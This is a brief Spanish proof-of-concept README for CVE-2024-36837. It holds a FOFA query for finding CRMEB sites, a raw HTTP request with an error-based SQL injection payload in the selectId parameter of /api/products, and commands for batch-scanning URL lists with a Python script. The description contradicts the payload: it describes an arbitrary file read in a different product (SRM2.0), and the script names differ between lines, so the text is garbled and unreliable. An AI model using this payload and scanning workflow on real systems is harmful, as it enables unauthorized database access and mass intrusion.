
CVE-2024-36837 Prueba de concepto
#CVE-2024-36837
#La interfaz runtimeLog/download de SRM2.0 de 智联云采 tiene una vulnerabilidad de lectura arbitraria de archivos. Un atacante no autenticado puede aprovechar esta vulnerabilidad para leer archivos importantes del sistema (como archivos de configuración de base de datos, archivos de configuración del sistema), archivos de configuración de base de datos, etc., lo que hace que el sitio sea extremadamente inseguro.
Sintaxis de fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
#POC:
GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #Agregue http:// o https:// antes de la URL python 11.py
#Cómo usar python cve.py -h
#Detección por lotes Las direcciones URL en url.txt deben tener http:// o https:// python cve.py -f url.txt
#Detección individual La dirección URL debe tener http:// o https:// python cve.py -u url